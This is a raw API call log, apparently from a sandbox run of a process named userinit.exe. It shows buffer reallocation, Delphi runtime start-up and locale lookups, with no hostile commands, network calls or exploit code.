[0138.244] GlobalUnlock (hMem=0x35000c) returned 0
[0138.244] GlobalReAlloc (hMem=0x35000c, dwBytes=0xb8000, uFlags=0x2) returned 0x35000c
[0138.273] GlobalLock (hMem=0x35000c) returned 0x2840020
[0138.274] GlobalHandle (pMem=0x2840020) returned 0x35000c
[0138.274] GlobalUnlock (hMem=0x35000c) returned 0
[0138.274] GlobalReAlloc (hMem=0x35000c, dwBytes=0xba000, uFlags=0x2) returned 0x35000c
[0138.337] GlobalLock (hMem=0x35000c) returned 0x2780020
[0138.337] GlobalHandle (pMem=0x2780020) returned 0x35000c
[0138.337] GlobalUnlock (hMem=0x35000c) returned 0
[0138.338] GlobalReAlloc (hMem=0x35000c, dwBytes=0xbc000, uFlags=0x2) returned 0x35000c
[0138.353] GlobalLock (hMem=0x35000c) returned 0x2840020
[0138.354] GlobalHandle (pMem=0x2840020) returned 0x35000c
[0138.354] GlobalUnlock (hMem=0x35000c) returned 0
[0138.354] GlobalReAlloc (hMem=0x35000c, dwBytes=0xbe000, uFlags=0x2) returned 0x35000c
[0138.370] GlobalLock (hMem=0x35000c) returned 0x2780020
[0138.371] GlobalHandle (pMem=0x2780020) returned 0x35000c
[0138.371] GlobalUnlock (hMem=0x35000c) returned 0
[0138.371] GlobalReAlloc (hMem=0x35000c, dwBytes=0xc0000, uFlags=0x2) returned 0x35000c
[0138.436] GlobalLock (hMem=0x35000c) returned 0x2840020
[0138.437] GlobalHandle (pMem=0x2840020) returned 0x35000c
[0138.437] GlobalUnlock (hMem=0x35000c) returned 0
[0138.437] GlobalReAlloc (hMem=0x35000c, dwBytes=0xc2000, uFlags=0x2) returned 0x35000c
[0138.452] GlobalLock (hMem=0x35000c) returned 0x2910020
[0138.453] GlobalHandle (pMem=0x2910020) returned 0x35000c
[0138.453] GlobalUnlock (hMem=0x35000c) returned 0
[0138.453] GlobalReAlloc (hMem=0x35000c, dwBytes=0xc4000, uFlags=0x2) returned 0x35000c
[0138.470] GlobalLock (hMem=0x35000c) returned 0x2780020
[0138.470] GlobalHandle (pMem=0x2780020) returned 0x35000c
[0138.471] GlobalUnlock (hMem=0x35000c) returned 0
[0138.471] GlobalReAlloc (hMem=0x35000c, dwBytes=0xc6000, uFlags=0x2) returned 0x35000c
[0138.535] GlobalLock (hMem=0x35000c) returned 0x2850020
[0138.536] GlobalHandle (pMem=0x2850020) returned 0x35000c
[0138.536] GlobalUnlock (hMem=0x35000c) returned 0
[0138.536] GlobalReAlloc (hMem=0x35000c, dwBytes=0xc8000, uFlags=0x2) returned 0x35000c
[0138.552] GlobalLock (hMem=0x35000c) returned 0x2780020
[0138.553] GlobalHandle (pMem=0x2780020) returned 0x35000c
[0138.553] GlobalUnlock (hMem=0x35000c) returned 0
[0138.553] GlobalReAlloc (hMem=0x35000c, dwBytes=0xca000, uFlags=0x2) returned 0x35000c
[0138.616] GlobalLock (hMem=0x35000c) returned 0x2850020
[0138.617] GlobalHandle (pMem=0x2850020) returned 0x35000c
[0138.617] GlobalUnlock (hMem=0x35000c) returned 0
[0138.617] GlobalReAlloc (hMem=0x35000c, dwBytes=0xcc000, uFlags=0x2) returned 0x35000c
[0138.633] GlobalLock (hMem=0x35000c) returned 0x2780020
[0138.634] GlobalHandle (pMem=0x2780020) returned 0x35000c
[0138.634] GlobalUnlock (hMem=0x35000c) returned 0
[0138.634] GlobalReAlloc (hMem=0x35000c, dwBytes=0xce000, uFlags=0x2) returned 0x35000c
[0138.651] GlobalLock (hMem=0x35000c) returned 0x2850020
[0138.652] GlobalHandle (pMem=0x2850020) returned 0x35000c
[0138.652] GlobalUnlock (hMem=0x35000c) returned 0
[0138.652] GlobalReAlloc (hMem=0x35000c, dwBytes=0xd0000, uFlags=0x2) returned 0x35000c
[0138.713] GlobalLock (hMem=0x35000c) returned 0x2920020
[0138.713] GlobalHandle (pMem=0x2920020) returned 0x35000c
[0138.713] GlobalUnlock (hMem=0x35000c) returned 0
[0138.713] GlobalReAlloc (hMem=0x35000c, dwBytes=0xd2000, uFlags=0x2) returned 0x35000c
[0138.731] GlobalLock (hMem=0x35000c) returned 0x2780020
[0138.732] GlobalHandle (pMem=0x2780020) returned 0x35000c
[0138.732] GlobalUnlock (hMem=0x35000c) returned 0
[0138.732] GlobalReAlloc (hMem=0x35000c, dwBytes=0xd4000, uFlags=0x2) returned 0x35000c
[0138.750] GlobalLock (hMem=0x35000c) returned 0x2860020
[0138.751] GlobalHandle (pMem=0x2860020) returned 0x35000c
[0138.751] GlobalUnlock (hMem=0x35000c) returned 0
[0138.751] GlobalReAlloc (hMem=0x35000c, dwBytes=0xd6000, uFlags=0x2) returned 0x35000c
[0138.816] GlobalLock (hMem=0x35000c) returned 0x2780020
[0138.817] GlobalHandle (pMem=0x2780020) returned 0x35000c
[0138.817] GlobalUnlock (hMem=0x35000c) returned 0
[0138.817] GlobalReAlloc (hMem=0x35000c, dwBytes=0xd8000, uFlags=0x2) returned 0x35000c
[0138.834] GlobalLock (hMem=0x35000c) returned 0x2860020
[0138.835] GlobalHandle (pMem=0x2860020) returned 0x35000c
[0138.835] GlobalUnlock (hMem=0x35000c) returned 0
[0138.835] GlobalReAlloc (hMem=0x35000c, dwBytes=0xda000, uFlags=0x2) returned 0x35000c
[0138.939] GlobalLock (hMem=0x35000c) returned 0x2780020
[0138.940] GlobalHandle (pMem=0x2780020) returned 0x35000c
[0138.940] GlobalUnlock (hMem=0x35000c) returned 0
[0138.940] GlobalReAlloc (hMem=0x35000c, dwBytes=0xdc000, uFlags=0x2) returned 0x35000c
[0138.958] GlobalLock (hMem=0x35000c) returned 0x2860020
[0138.959] GlobalHandle (pMem=0x2860020) returned 0x35000c
[0138.959] GlobalUnlock (hMem=0x35000c) returned 0
[0138.959] GlobalReAlloc (hMem=0x35000c, dwBytes=0xde000, uFlags=0x2) returned 0x35000c
[0139.026] GlobalLock (hMem=0x35000c) returned 0x2780020
[0139.027] GlobalHandle (pMem=0x2780020) returned 0x35000c
[0139.027] GlobalUnlock (hMem=0x35000c) returned 0
[0139.027] GlobalReAlloc (hMem=0x35000c, dwBytes=0xe0000, uFlags=0x2) returned 0x35000c
[0139.045] GlobalLock (hMem=0x35000c) returned 0x2860020
[0139.045] GlobalHandle (pMem=0x2860020) returned 0x35000c
[0139.045] GlobalUnlock (hMem=0x35000c) returned 0
[0139.046] GlobalReAlloc (hMem=0x35000c, dwBytes=0xe2000, uFlags=0x2) returned 0x35000c
[0139.110] GlobalLock (hMem=0x35000c) returned 0x2950020
[0139.111] GlobalHandle (pMem=0x2950020) returned 0x35000c
[0139.111] GlobalUnlock (hMem=0x35000c) returned 0
[0139.111] GlobalReAlloc (hMem=0x35000c, dwBytes=0xe4000, uFlags=0x2) returned 0x35000c
[0139.132] GlobalLock (hMem=0x35000c) returned 0x2780020
[0139.133] GlobalHandle (pMem=0x2780020) returned 0x35000c
[0139.133] GlobalUnlock (hMem=0x35000c) returned 0
[0139.133] GlobalReAlloc (hMem=0x35000c, dwBytes=0xe6000, uFlags=0x2) returned 0x35000c
[0139.200] GlobalLock (hMem=0x35000c) returned 0x2870020
[0139.200] GlobalHandle (pMem=0x2870020) returned 0x35000c
[0139.200] GlobalUnlock (hMem=0x35000c) returned 0
[0139.200] GlobalReAlloc (hMem=0x35000c, dwBytes=0xe8000, uFlags=0x2) returned 0x35000c
[0139.220] GlobalLock (hMem=0x35000c) returned 0x2780020
[0139.221] GlobalHandle (pMem=0x2780020) returned 0x35000c
[0139.221] GlobalUnlock (hMem=0x35000c) returned 0
[0139.221] GlobalReAlloc (hMem=0x35000c, dwBytes=0xea000, uFlags=0x2) returned 0x35000c
[0139.288] GlobalLock (hMem=0x35000c) returned 0x2870020
[0139.289] GlobalHandle (pMem=0x2870020) returned 0x35000c
[0139.289] GlobalUnlock (hMem=0x35000c) returned 0
[0139.289] GlobalReAlloc (hMem=0x35000c, dwBytes=0xec000, uFlags=0x2) returned 0x35000c
[0139.312] GlobalLock (hMem=0x35000c) returned 0x2780020
[0139.313] GlobalHandle (pMem=0x2780020) returned 0x35000c
[0139.313] GlobalUnlock (hMem=0x35000c) returned 0
[0139.313] GlobalReAlloc (hMem=0x35000c, dwBytes=0xee000, uFlags=0x2) returned 0x35000c
[0139.385] GlobalLock (hMem=0x35000c) returned 0x2870020
[0139.386] GlobalHandle (pMem=0x2870020) returned 0x35000c
[0139.386] GlobalUnlock (hMem=0x35000c) returned 0
[0139.386] GlobalReAlloc (hMem=0x35000c, dwBytes=0xf0000, uFlags=0x2) returned 0x35000c
[0139.411] GlobalLock (hMem=0x35000c) returned 0x2960020
[0139.412] GlobalHandle (pMem=0x2960020) returned 0x35000c
[0139.412] GlobalUnlock (hMem=0x35000c) returned 0
[0139.412] GlobalReAlloc (hMem=0x35000c, dwBytes=0xf2000, uFlags=0x2) returned 0x35000c
[0139.484] GlobalLock (hMem=0x35000c) returned 0x2780020
[0139.485] GlobalHandle (pMem=0x2780020) returned 0x35000c
[0139.485] GlobalUnlock (hMem=0x35000c) returned 0
[0139.485] GlobalReAlloc (hMem=0x35000c, dwBytes=0xf4000, uFlags=0x2) returned 0x35000c
[0139.509] GlobalLock (hMem=0x35000c) returned 0x2880020
[0139.510] GlobalHandle (pMem=0x2880020) returned 0x35000c
[0139.510] GlobalUnlock (hMem=0x35000c) returned 0
[0139.510] GlobalReAlloc (hMem=0x35000c, dwBytes=0xf6000, uFlags=0x2) returned 0x35000c
[0139.581] GlobalLock (hMem=0x35000c) returned 0x2780020
[0139.583] GlobalHandle (pMem=0x2780020) returned 0x35000c
[0139.583] GlobalUnlock (hMem=0x35000c) returned 0
[0139.583] GlobalReAlloc (hMem=0x35000c, dwBytes=0xf8000, uFlags=0x2) returned 0x35000c
[0139.607] GlobalLock (hMem=0x35000c) returned 0x2880020
[0139.608] GlobalHandle (pMem=0x2880020) returned 0x35000c
[0139.608] GlobalUnlock (hMem=0x35000c) returned 0
[0139.608] GlobalReAlloc (hMem=0x35000c, dwBytes=0xfa000, uFlags=0x2) returned 0x35000c
[0139.665] GlobalLock (hMem=0x35000c) returned 0x2780020
[0139.666] GlobalHandle (pMem=0x2780020) returned 0x35000c
[0139.666] GlobalUnlock (hMem=0x35000c) returned 0
[0139.667] GlobalReAlloc (hMem=0x35000c, dwBytes=0xfc000, uFlags=0x2) returned 0x35000c
[0139.739] GlobalLock (hMem=0x35000c) returned 0x2880020
[0139.740] GlobalHandle (pMem=0x2880020) returned 0x35000c
[0139.740] GlobalUnlock (hMem=0x35000c) returned 0
[0139.740] GlobalReAlloc (hMem=0x35000c, dwBytes=0xfe000, uFlags=0x2) returned 0x35000c
[0139.763] GlobalLock (hMem=0x35000c) returned 0x2780020
[0139.764] GlobalHandle (pMem=0x2780020) returned 0x35000c
[0139.764] GlobalUnlock (hMem=0x35000c) returned 0
[0139.764] GlobalReAlloc (hMem=0x35000c, dwBytes=0x100000, uFlags=0x2) returned 0x35000c
[0139.842] GlobalLock (hMem=0x35000c) returned 0x2880020
[0139.843] GlobalHandle (pMem=0x2880020) returned 0x35000c
[0139.843] GlobalUnlock (hMem=0x35000c) returned 0
[0139.843] GlobalReAlloc (hMem=0x35000c, dwBytes=0x102000, uFlags=0x2) returned 0x35000c
[0139.916] GlobalLock (hMem=0x35000c) returned 0x2990020
[0139.917] GlobalHandle (pMem=0x2990020) returned 0x35000c
[0139.917] GlobalUnlock (hMem=0x35000c) returned 0
[0139.918] GlobalReAlloc (hMem=0x35000c, dwBytes=0x104000, uFlags=0x2) returned 0x35000c
[0139.944] GlobalLock (hMem=0x35000c) returned 0x2780020
[0139.945] GlobalHandle (pMem=0x2780020) returned 0x35000c
[0139.945] GlobalUnlock (hMem=0x35000c) returned 0
[0139.945] GlobalReAlloc (hMem=0x35000c, dwBytes=0x106000, uFlags=0x2) returned 0x35000c
[0140.014] GlobalLock (hMem=0x35000c) returned 0x2890020
[0140.015] GlobalHandle (pMem=0x2890020) returned 0x35000c
[0140.015] GlobalUnlock (hMem=0x35000c) returned 0
[0140.015] GlobalReAlloc (hMem=0x35000c, dwBytes=0x108000, uFlags=0x2) returned 0x35000c
[0140.037] GlobalLock (hMem=0x35000c) returned 0x2780020
[0140.038] GlobalHandle (pMem=0x2780020) returned 0x35000c
[0140.038] GlobalUnlock (hMem=0x35000c) returned 0
[0140.038] GlobalReAlloc (hMem=0x35000c, dwBytes=0x10a000, uFlags=0x2) returned 0x35000c
[0140.108] GlobalLock (hMem=0x35000c) returned 0x2890020
[0140.109] GlobalHandle (pMem=0x2890020) returned 0x35000c
[0140.109] GlobalUnlock (hMem=0x35000c) returned 0
[0140.109] GlobalReAlloc (hMem=0x35000c, dwBytes=0x10c000, uFlags=0x2) returned 0x35000c
[0140.130] GlobalLock (hMem=0x35000c) returned 0x2780020
[0140.130] VirtualAlloc (lpAddress=0x0, dwSize=0x110000, flAllocationType=0x2000, flProtect=0x1) returned 0x2890000
[0140.131] VirtualAlloc (lpAddress=0x2890000, dwSize=0x10c000, flAllocationType=0x1000, flProtect=0x4) returned 0x2890000
[0140.216] GetKeyboardType (nTypeFlag=0) returned 4
[0140.216] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0140.216] GetStartupInfoA (in: lpStartupInfo=0x18f5d0 | out: lpStartupInfo=0x18f5d0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0140.216] GetVersion () returned 0x1db10106
[0140.216] GetVersion () returned 0x1db10106
[0140.216] GetCurrentThreadId () returned 0x89c
[0140.216] GetModuleFileNameA (in: hModule=0x29a0000, lpFilename=0x18f0cc, nSize=0x105 | out: lpFilename="\xdc\xf0\x18" (normalized: "c:\\windows\\system32\\üð\x18")) returned 0x0
[0140.216] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18efa7, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0140.216] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f0bc | out: phkResult=0x18f0bc*=0x0) returned 0x2
[0140.216] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f0bc | out: phkResult=0x18f0bc*=0x0) returned 0x2
[0140.217] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f0bc | out: phkResult=0x18f0bc*=0x0) returned 0x2
[0140.217] lstrcpynA (in: lpString1=0x18efa7, lpString2="\xdc\xf0\x18", iMaxLength=261 | out: lpString1="\xdc\xf0\x18") returned="\xdc\xf0\x18"
[0140.217] GetThreadLocale () returned 0x409
[0140.217] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x18f0b7, cchData=5 | out: lpLCData="ENU") returned 4
[0140.217] lstrlenA (lpString="\xdc\xf0\x18") returned 3
[0140.217] LoadStringA (in: hInstance=0x29a0000, uID=0xffc4, lpBuffer=0x18f1f0, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0140.217] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x5bdcc0
[0140.217] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x2ac0000
[0140.217] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x5becc0
[0140.217] VirtualAlloc (lpAddress=0x2ac0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2ac0000
[0140.217] LoadStringA (in: hInstance=0x29a0000, uID=0xffc3, lpBuffer=0x18f1f0, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0140.217] LoadStringA (in: hInstance=0x29a0000, uID=0xffc1, lpBuffer=0x18f1f0, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0140.217] LoadStringA (in: hInstance=0x29a0000, uID=0xffc2, lpBuffer=0x18f1f0, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0140.217] LoadStringA (in: hInstance=0x29a0000, uID=0xffd4, lpBuffer=0x18f1f0, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0140.217] LoadStringA (in: hInstance=0x29a0000, uID=0xffdd, lpBuffer=0x18f1f0, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0140.217] LoadStringA (in: hInstance=0x29a0000, uID=0xffd3, lpBuffer=0x18f1f0, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0140.217] LoadStringA (in: hInstance=0x29a0000, uID=0xffd0, lpBuffer=0x18f1f0, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0140.218] LoadStringA (in: hInstance=0x29a0000, uID=0xffd7, lpBuffer=0x18f1f0, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0140.218] LoadStringA (in: hInstance=0x29a0000, uID=0xffd6, lpBuffer=0x18f1f0, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0140.218] LoadStringA (in: hInstance=0x29a0000, uID=0xffe8, lpBuffer=0x18f1f0, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0140.218] LoadStringA (in: hInstance=0x29a0000, uID=0xffe9, lpBuffer=0x18f1f0, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0140.218] LoadStringA (in: hInstance=0x29a0000, uID=0xffea, lpBuffer=0x18f1f0, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0140.218] LoadStringA (in: hInstance=0x29a0000, uID=0xffe7, lpBuffer=0x18f1f0, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0140.218] LoadStringA (in: hInstance=0x29a0000, uID=0xffe5, lpBuffer=0x18f1f0, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0140.218] LoadStringA (in: hInstance=0x29a0000, uID=0xffe3, lpBuffer=0x18f1f0, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0140.218] LoadStringA (in: hInstance=0x29a0000, uID=0xffe2, lpBuffer=0x18f1f0, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0140.218] LoadStringA (in: hInstance=0x29a0000, uID=0xffe1, lpBuffer=0x18f1f0, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0140.218] LoadStringA (in: hInstance=0x29a0000, uID=0xffe0, lpBuffer=0x18f1f0, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0140.218] LoadStringA (in: hInstance=0x29a0000, uID=0xffff, lpBuffer=0x18f1f0, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0140.218] LoadStringA (in: hInstance=0x29a0000, uID=0xfffe, lpBuffer=0x18f1f0, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0140.218] LoadStringA (in: hInstance=0x29a0000, uID=0xfffd, lpBuffer=0x18f1f0, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0140.218] LoadStringA (in: hInstance=0x29a0000, uID=0xfffc, lpBuffer=0x18f1f0, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0140.218] LoadStringA (in: hInstance=0x29a0000, uID=0xfffb, lpBuffer=0x18f1f0, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0140.218] LoadStringA (in: hInstance=0x29a0000, uID=0xfffa, lpBuffer=0x18f1f0, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0140.218] LoadStringA (in: hInstance=0x29a0000, uID=0xfff9, lpBuffer=0x18f1f0, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0140.218] LoadStringA (in: hInstance=0x29a0000, uID=0xfff8, lpBuffer=0x18f1f0, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0140.218] LoadStringA (in: hInstance=0x29a0000, uID=0xfff7, lpBuffer=0x18f1f0, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0140.218] LoadStringA (in: hInstance=0x29a0000, uID=0xfff6, lpBuffer=0x18f1f0, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0140.218] LoadStringA (in: hInstance=0x29a0000, uID=0xfff4, lpBuffer=0x18f1dc, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0140.218] LoadStringA (in: hInstance=0x29a0000, uID=0xffe4, lpBuffer=0x18f1dc, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0140.218] GetVersionExA (in: lpVersionInformation=0x18f574*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x29a0000, dwMinorVersion=0x0, dwBuildNumber=0x28, dwPlatformId=0x65636341, szCSDVersion="ssibleObjectFromr<\x9a\x02·\"\x9a\x02\x0cö\x18") | out: lpVersionInformation=0x18f574*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0140.218] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0140.218] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0140.218] GetThreadLocale () returned 0x409
[0140.218] GetThreadLocale () returned 0x409
[0140.218] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x18f44c, cchData=256 | out: lpLCData="Jan") returned 4
[0140.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x18f44c, cchData=256 | out: lpLCData="January") returned 8
[0140.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x18f44c, cchData=256 | out: lpLCData="Feb") returned 4
[0140.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x18f44c, cchData=256 | out: lpLCData="February") returned 9
[0140.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x18f44c, cchData=256 | out: lpLCData="Mar") returned 4
[0140.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x18f44c, cchData=256 | out: lpLCData="March") returned 6
[0140.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x18f44c, cchData=256 | out: lpLCData="Apr") returned 4
[0140.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x18f44c, cchData=256 | out: lpLCData="April") returned 6
[0140.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x18f44c, cchData=256 | out: lpLCData="May") returned 4
[0140.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x18f44c, cchData=256 | out: lpLCData="May") returned 4
[0140.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x18f44c, cchData=256 | out: lpLCData="Jun") returned 4
[0140.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x18f44c, cchData=256 | out: lpLCData="June") returned 5
[0140.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x18f44c, cchData=256 | out: lpLCData="Jul") returned 4
[0140.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x18f44c, cchData=256 | out: lpLCData="July") returned 5
[0140.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x18f44c, cchData=256 | out: lpLCData="Aug") returned 4
[0140.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x18f44c, cchData=256 | out: lpLCData="August") returned 7
[0140.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x18f44c, cchData=256 | out: lpLCData="Sep") returned 4
[0140.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x18f44c, cchData=256 | out: lpLCData="September") returned 10
[0140.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x18f44c, cchData=256 | out: lpLCData="Oct") returned 4
[0140.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x18f44c, cchData=256 | out: lpLCData="October") returned 8
[0140.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x18f44c, cchData=256 | out: lpLCData="Nov") returned 4
[0140.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x18f44c, cchData=256 | out: lpLCData="November") returned 9
[0140.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x18f44c, cchData=256 | out: lpLCData="Dec") returned 4
[0140.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x18f44c, cchData=256 | out: lpLCData="December") returned 9
[0140.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x18f44c, cchData=256 | out: lpLCData="Sun") returned 4
[0140.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x18f44c, cchData=256 | out: lpLCData="Sunday") returned 7
[0140.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x18f44c, cchData=256 | out: lpLCData="Mon") returned 4
[0140.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x18f44c, cchData=256 | out: lpLCData="Monday") returned 7
[0140.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x18f44c, cchData=256 | out: lpLCData="Tue") returned 4
[0140.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x18f44c, cchData=256 | out: lpLCData="Tuesday") returned 8
[0140.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x18f44c, cchData=256 | out: lpLCData="Wed") returned 4
[0140.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x18f44c, cchData=256 | out: lpLCData="Wednesday") returned 10
[0140.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x18f44c, cchData=256 | out: lpLCData="Thu") returned 4
[0140.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x18f44c, cchData=256 | out: lpLCData="Thursday") returned 9
[0140.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x18f44c, cchData=256 | out: lpLCData="Fri") returned 4
[0140.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x18f44c, cchData=256 | out: lpLCData="Friday") returned 7
[0140.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x18f44c, cchData=256 | out: lpLCData="Sat") returned 4
[0140.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x18f44c, cchData=256 | out: lpLCData="Saturday") returned 9
[0140.220] GetThreadLocale () returned 0x409
[0140.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x18f4a8, cchData=256 | out: lpLCData="$") returned 2
[0140.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x18f4a8, cchData=256 | out: lpLCData="0") returned 2
[0140.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x18f4a8, cchData=256 | out: lpLCData="0") returned 2
[0140.220] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x18f5a0, cchData=2 | out: lpLCData=",") returned 2
[0140.220] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x18f5a0, cchData=2 | out: lpLCData=".") returned 2
[0140.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x18f4a8, cchData=256 | out: lpLCData="2") returned 2
[0140.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x18f5a0, cchData=2 | out: lpLCData="/") returned 2
[0140.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x18f4a8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0140.220] GetThreadLocale () returned 0x409
[0140.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18f474, cchData=256 | out: lpLCData="1") returned 2
[0140.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x18f4a8, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0140.220] GetThreadLocale () returned 0x409
[0140.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18f474, cchData=256 | out: lpLCData="1") returned 2
[0140.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x18f5a0, cchData=2 | out: lpLCData=":") returned 2
[0140.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x18f4a8, cchData=256 | out: lpLCData="AM") returned 3
[0140.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x18f4a8, cchData=256 | out: lpLCData="PM") returned 3
[0140.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x18f4a8, cchData=256 | out: lpLCData="0") returned 2
